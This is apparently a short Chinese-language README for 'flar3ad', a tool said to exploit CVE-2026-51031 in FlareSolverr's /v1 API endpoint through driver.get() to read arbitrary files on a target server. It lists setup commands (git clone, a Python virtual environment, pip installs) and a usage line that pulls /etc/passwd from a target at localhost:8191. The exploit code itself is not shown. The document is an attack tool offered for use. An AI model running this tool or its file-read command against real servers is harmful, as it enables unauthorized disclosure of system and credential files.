flar3ad 是一款利用 CVE-2026-51031 的工具,可通过 FlareSolverr API 的 /v1 端点并使用 driver.get() 函数来利用该漏洞,从而读取目标服务器上的文件。详细说明见 xinyi 的博客。
git clone https://github.com/daemoncibsec/flar3ad.git
cd flar3ad
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x flar3ad
退出虚拟环境:
deactivate
读取目标服务器上的 /etc/passwd 文件。
./flar3ad http://localhost:8191/ /etc/passwd